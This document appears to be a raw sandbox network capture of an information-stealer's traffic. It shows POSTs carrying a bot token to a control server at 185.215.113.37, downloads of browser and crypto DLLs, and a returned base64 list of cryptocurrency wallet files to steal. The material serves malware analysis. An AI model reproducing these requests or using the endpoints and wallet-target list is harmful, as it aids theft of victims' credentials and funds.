Oct 10, 2024 18:23:09.593246937 CEST	5571	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 Data Ascii: ------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 10, 2024 18:23:10.357717991 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:10.578896046 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 10, 2024 18:23:10.841716051 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 10, 2024 18:23:10.841767073 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 10, 2024 18:23:10.841779947 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 10, 2024 18:23:12.315742016 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFCFIEBKEGHIDGCAFBF Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Oct 10, 2024 18:23:13.051809072 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:13.196525097 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAFIJKKEHJDHJKFIECA Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Oct 10, 2024 18:23:13.931143045 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:13.946635962 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="file"------CBFBGCGIJKJJKFIDBFCG--
Oct 10, 2024 18:23:14.670773029 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:14 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:15.076569080 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHI Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="file"------GDHDAEBGCAAFIDGCGDHI--
Oct 10, 2024 18:23:15.804219007 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:16.044790030 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 10, 2024 18:23:16.265424967 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 10, 2024 18:23:17.092967033 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 10, 2024 18:23:17.317047119 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 10, 2024 18:23:17.829629898 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 10, 2024 18:23:18.051469088 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 10, 2024 18:23:18.404756069 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 10, 2024 18:23:18.633963108 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 10, 2024 18:23:20.415507078 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 10, 2024 18:23:20.637449980 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 10, 2024 18:23:21.071029902 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 10, 2024 18:23:21.291826010 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 10, 2024 18:23:21.975430965 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 10, 2024 18:23:22.854660988 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:23.121854067 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBG Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="message"wallets------ECGDHDHJEBGHJKFIECBG--
Oct 10, 2024 18:23:23.345200062 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:23 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhv